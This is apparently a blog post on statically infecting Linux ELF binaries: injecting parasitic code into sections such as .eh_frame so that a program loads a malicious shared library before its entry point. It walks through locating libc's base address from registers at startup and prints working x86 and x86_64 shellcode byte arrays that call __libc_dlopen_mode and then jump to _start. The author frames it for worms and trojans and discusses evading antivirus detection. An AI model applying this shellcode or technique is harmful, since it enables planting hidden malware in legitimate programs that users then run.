ELF Static Injection to Load Malicious Dynamic Link Library
TL;DR In this blog post, I will go through the process of why and how I built a new framework called spirit
๐, using which, I was able to load malicious dynamic link library by injecting parasitic code into the ELF file. You will see the huge difference between this static injection and the tranditional so Hijacking in Linux.
Introduction
As we know, whether it is dll hijacking in Windows or so hijacking in Linux, their idea is to insert code when the program is running to load the dynamic link library (so). This method is called dynamic injection, which is to inject a so into a process. There are many so injection tools, such as ptrace
and hookso
. There is no doubt that these tools require administrator or file owners to run. In the field of worms, Trojan horses and viruses, or in the field of security protection, we need a technology similar to the patch program to write malicious code into legitimate programs.
One way is to write malicious code directly into a specific section of the ELF file, but this way may be easily found and intercepted by anti-virus software; the other way is to only inject some regular code to load a malicious dynamic Link library, all logic is completed in so
, it seems more subtle than the previously method mentioned.
Letโs start by reading the definition of static injection:
ELF loads malicious so at virtual address space by injecting parasitic code into it before running.
Although I haven’t found the tools or cases I want, I believe there will be some similar cases or technologies in the professional field. Here I just share some independent research and corresponding code implementation I have done.
Dependencies
We run elfspirit using:
- Ubuntu 20.04 / Kali Linux 2020.4
- gcc 10.2.1
- libc-2.31/2.32
Idea
Modify .eh_frame
(of course you can also choose other sections, .eh_frame
is a favorite section of malware), write assembly code (generally called parasitic code), and load so
with __libc_dlopen_mode
provided by libc
.
The most basic usage of __libc_dlopen_mode
is the same as dlopen
.
int main(int argc, char const *argv[])
{
char lib_name[] = "libpatchdemo.so";
void * handle = __libc_dlopen_mode(lib_name, RTLD_LAZY);
func = dlsym(handle, "hello_world");
func();
return 0;
}
Entry point for ELF file
I believe that the first program of most programmers is hello world, and they all have only one function, namely main
. When we were still students, the teacher told us that the entry point of the program was the main
function. But is this really the case?
Here is a good overview of what happens during program startup before main
. In particular, it shows that __start
is the actual entry point to your program from OS viewpoint.
As a result, _start
is the very first address from which the instruction pointer will start counting in the program.
While main
is the entry point for your program from a programmers perspective, _start
is the usual entry point from the OS perspective (the first instruction that is executed after your program was started from the OS).
Base Address of Libc
How does the parasitic code know the base address of libc before ELF is running?
This is an interesting question. In different operating systems, there may be different answers. Here we have conducted experiments on Ubuntu 20.04 and Kali 2020.04.
x86
Before the _start
function runs, check the values of all registers and try to find the values that may be associated with the base addresses of libraries such as libc
. We found an interesting phenomenon, that is, ebx
stores the real address of .got.plt
in ld-2.31.so
.
$ebx : 0xf7ffd000 โ 0x0002af3c
gefโค xinfo 0xf7ffd000
โโโโโโโโโ xinfo: 0xf7ffd000 โโโโโโโโโโโโโโโโโโโโโโ
Page: 0xf7ffd000 โ 0xf7ffe000 (size=0x1000)
Permissions: rw-
Pathname: /usr/lib32/ld-2.31.so
Offset (from page): 0x0
Inode: 3174763
Segment: .got.plt (0xf7ffd000-0xf7ffd028)
Offset (from segment): 0x0
Continue to view the contents of .got.plt
in ELF loader.
gefโค x/dx 0xf7ffd00c
0xf7ffd00c <_dl_catch_exception@got.plt>: 0xf7f084e0
The function _dl_catch_exception()
belongs to libc.so
.text:0013F4E0 public _dl_catch_exception
.text:0013F4E0 _dl_catch_exception proc near ; CODE XREF: sub_13EE00+3D7โp
.text:0013F4E0 ; _dl_catch_error+2Bโp
Therefore, the base address of libc
is as follows.
mov ecx, DWORD PTR [ebx + 0xc]
sub ecx, 0x0013F4E0
We need to find the offset address of some functions in loader
or libc
:
_dl_catch_exception_got
(loader)_dl_catch_exception
,__libc_dlopen_mode
(libc)
The actual debugging results of the assembly code are as follows
x86_64
Refer to the method in the previous chapter, we also found address about libc
in rdx
. The address points to the symbol _dl_fini
in ld.so
.
$rdx : 0x00007ffff7fe21b0 โ <_dl_fini+0> push rbp
gefโค xinfo 0x00007ffff7fe22f0
โโโโโโโโโโโโโโโโโโโโ xinfo: 0x7ffff7fe22f0 โโโโโโโโโโโโโโโโโโโโโโโโโ
Page: 0x00007ffff7fd3000 โ 0x00007ffff7ff3000 (size=0x20000)
Permissions: r-x
Pathname: /usr/lib/x86_64-linux-gnu/ld-2.32.so
Offset (from page): 0xf2f0
Inode: 3151771
Segment: .text (0x00007ffff7fd3050-0x00007ffff7ff2cbe)
Offset (from segment): 0xf2a0
Symbol: _dl_fini
ld-2.32.so
- symbol
_ld_fini
offset๏ผ0x102f0
- symbol
_dl_catch_exception
๏ผ.got.plt
๏ผoffset๏ผ0x2B018
libc base address = [rdx + (0x2B018 - 0x102f0)] - 0x137A90, That is
mov r9, [rdx + _ld_catch_exception_got - _ld_fini]
sub r9, _ld_catch_exceptiona
If you want to continue calling __libc_dlopen_mode
, you need add a line of assembly code as follows.
add r9, __libc_dlopen_mode
We need to find the offset address of some functions in loade
r or libc
:
_ld_fini
,_dl_catch_exception_got
(loader)_dl_catch_exception
,__libc_dlopen_mode
(libc)
Parasitic Code
All parasitic codes need to consider keep the original register state. The code we inserted is located between the loader and the ELF binary. Any register change may cause the program to crash. The safest approach is that the first part of the parasitic code is used to save the values of all registers, and the end part of the parasitic code is used to restore the values of all registers.
Here, we briefly analyze which registers will not affect the subsequent normal operation of the program.
It can be seen from the code of _start
that modifying the three registers of ebp/esi/ecx
will not affect the data flow. The _start
is automatically generated by gcc, and the behavior of different compilers may vary.
$ gcc --version
gcc (Debian 10.2.1-6) 10.2.1 20210110
Copyright (C) 2020 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
In the end, it is necessary to jump to the entrance of the program so that the program can run normally. Therefore, it is necessary to recalculate the offset of the _start function at the end of the parasitic code, and use the corresponding assembly instruction to jump.
Can I directly use assembly similar to jmp ecx
to jump? The answer is no. Because the jmp
instruction does not have the ability to restore the stack. After loading the target so and jumping to execute _start
, when the main function is executed, it still needs to jump back to the beginning of the program to deinit.
Get the value of the ip
register
|e8|target address - EIP|
32bit
call 0x5
pop eax (eip)
64bit
lea rax, [rip]
32bit
uint8_t sc_x86[] = \
/* start */
"\x55" // push ebp
"\x89\xe5" // mov ebp, esp
"\x83\xec\x28" // sub esp, 28h
"\xc7\x45\xe4\x6c\x69\x62\x70" // mov DWORD PTR [ebp-0x1c],0x7062696c
"\xc7\x45\xe8\x61\x74\x63\x68" // mov DWORD PTR [ebp-0x18],0x68637461
"\xc7\x45\xec\x64\x65\x6d\x6f" // mov DWORD PTR [ebp-0x14],0x6f6d6564
"\xc7\x45\xf0\x2e\x73\x6f\x00" // mov DWORD PTR [ebp-0x10],0x6f732e
"\x6a\x01" // push 0x1
"\x8d\x6d\xe4" // lea ebp, [ebp-0x1c]
"\x55" // push ebp
"\x8b\x4b\x0c" // mov ecx, DWORD PTR [ebx + 0xc]
"\x81\xe9\xe0\xf4\x13\x00" // sub ecx, 0x0013F4E0
"\x81\xc1\xf0\xea\x13\x00" // add ecx, 0x0013EAF0
"\xff\xd1" // call ecx --> <__libc_dlopen_mode@plt>
/* */
"\x83\xc4\x08" // add esp, 0x8
"\xc9" // leave
/* end */
"\xe8" // call <_start> (e8 ** = _start - eip)
"\x00\x00\x00\x00";
64bit
uint8_t sc_x86_64[] = \
/* start */
"\x55" // push rbp
"\x48\x89\xe5" // mov rbp, rsp
"\x48\x83\xec\x30" // sub rsp, 30h
"\x48\xb8\x6c\x69\x62\x70\x61\x74\x63\x68" // movabs rax,0x686374617062696c
"\x48\xbb\x64\x65\x6d\x6f\x2e\x73\x6f\x00" // movabs rbx,0x6f732e6f6d6564
"\x48\x89\x45\xe0" // mov QWORD PTR [rbp-0x20],rax
"\x48\x89\x5d\xe8" // mov QWORD PTR [rbp-0x18],rbx
"\x48\x8d\x45\xe0" // lea rax,[rbp-0x20]
"\xbe\x01\x00\x00\x00" // mov esi,0x1
"\x48\x89\xc7" // mov rdi,rax
"\x4c\x8b\x8a\x68\xae\x01\x00" // mov r9, [rdx + 0x1ae68]
"\x49\x81\xe9\xe0\x81\x13\x00" // sub r9, 0x0000000001381E0
"\x49\x81\xc1\x00\x78\x13\x00" // add r9, 0x000000000137800
"\x41\xff\xd1" // call r9
"\xc9" // leave
/* end */
"\xe8\x0b\x00\x00\x00"; // call <_start>
Further thought
By modifying the elf entry and injecting parasitic code, it is actually easy to be detected by some protection programs. We can further optimize our solution in the future, for example, directly modify the first line of code of the _start
function to jump to the parasitic section. The parasitic code then implements the function of _start
.
elfspirit has integrated all the codes involved in this article, have fun.
๐ Congratulations, @EDG_Edward! #Worlds2021